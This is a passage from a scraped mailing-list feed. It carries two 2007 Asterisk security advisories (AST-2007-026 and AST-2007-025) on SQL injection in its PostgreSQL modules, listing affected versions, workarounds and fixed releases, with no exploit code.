&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | usernames and passwords used for SIP authentication, &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | among other things. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | This module is not active by default and must be &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | configured for use by the administrator. Default &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | installations of Asterisk are not affected. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Workaround | Convert your installation to use cdr_odbc with the &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| PgsqlODBC driver. This module provides similar &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| functionality but is not vulnerable. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Resolution &amp;nbsp; &amp;nbsp;| Upgrade to Asterisk release 1.4.15 or higher. &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Affected Versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; Release &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; Series &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| All versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.2.x &amp;nbsp; &amp;nbsp;| 1.2.24 and previous &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.4.x &amp;nbsp; &amp;nbsp;| 1.4.14 and previous &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Asterisk Business Edition &amp;nbsp; | &amp;nbsp; &amp;nbsp;A.x.x &amp;nbsp; &amp;nbsp;| All versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Asterisk Business Edition &amp;nbsp; | &amp;nbsp; &amp;nbsp;B.x.x &amp;nbsp; &amp;nbsp;| B.2.3.3 and previous &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Asterisk Business Edition &amp;nbsp; | &amp;nbsp; &amp;nbsp;C.x.x &amp;nbsp; &amp;nbsp;| C.1.0-beta5 and previous |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;AsteriskNOW &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| pre-release | None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Appliance Developer &amp;nbsp;| &amp;nbsp; &amp;nbsp;0.x.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Kit &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------+-------------+--------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp;s800i (Asterisk Appliance) &amp;nbsp; | &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Corrected In &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.2.25 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.4.15 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Business Edition &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;B.2.3.4 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Business Edition &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C.1.0-beta6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Links &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Project Security Advisories are posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://www.asterisk.org/security&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.asterisk.org/security&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| This document may be superseded by later versions; if so, the latest &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| version will be posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2007-026.pdf&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2007-026.pdf&lt;/a&gt;&amp;nbsp;and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2007-026.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2007-026.html&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Revision History &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Date &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Editor &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Revisions Made &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------+--------------------+----------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| 2007-11-29 &amp;nbsp; &amp;nbsp; | Tilghman Lesher &amp;nbsp; &amp;nbsp;| Initial release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------+--------------------+----------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| 2007-11-29 &amp;nbsp; &amp;nbsp; | Tilghman Lesher &amp;nbsp; &amp;nbsp;| Added CVE, ABE C version &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Asterisk Project Security Advisory - AST-2007-026
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Copyright (c) 2007 Digium, Inc. All Rights Reserved.
&lt;br&gt;&amp;nbsp; Permission is hereby granted to distribute and publish this advisory in its
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;original, unaltered form.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/AST-2007-026---SQL-Injection-issue-in-cdr_pgsql-tp14140680p14140680.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14139556</id>
	<title>AST-2007-025 - SQL Injection issue in res_config_pgsql</title>
	<published>2007-11-29T15:11:59Z</published>
	<updated>2007-11-29T15:11:59Z</updated>
	<author>
		<name>Asterisk Security Team-2</name>
	</author>
	<content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Asterisk Project Security Advisory - AST-2007-025
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Asterisk &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Summary &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| SQL Injection issue in res_config_pgsql &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp;Nature of Advisory &amp;nbsp;| SQL Injection &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Susceptibility &amp;nbsp; &amp;nbsp;| Remote Unauthenticated Sessions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Severity &amp;nbsp; &amp;nbsp; &amp;nbsp; | Moderate &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Exploits Known &amp;nbsp; &amp;nbsp;| No &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Reported On &amp;nbsp; &amp;nbsp; &amp;nbsp;| November 29, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Reported By &amp;nbsp; &amp;nbsp; &amp;nbsp;| P. Chisteas &amp;lt;p_christ AT hol DOT gr&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Posted On &amp;nbsp; &amp;nbsp; &amp;nbsp; | November 29, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Last Updated On &amp;nbsp; &amp;nbsp;| November 29, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Advisory Contact &amp;nbsp; | Tilghman Lesher &amp;lt;tlesher AT digium DOT com&amp;gt; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------+-------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; CVE Name &amp;nbsp; &amp;nbsp; &amp;nbsp; | CVE-2007-6171 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Description | Input buffers were not properly escaped when providing &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | lookup data to the Postgres Realtime Engine. An attacker |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | could potentially compromise the administrative database |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | containing users' usernames and passwords used for SIP &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | authentication, among other things. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | This module is not active by default and must be &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
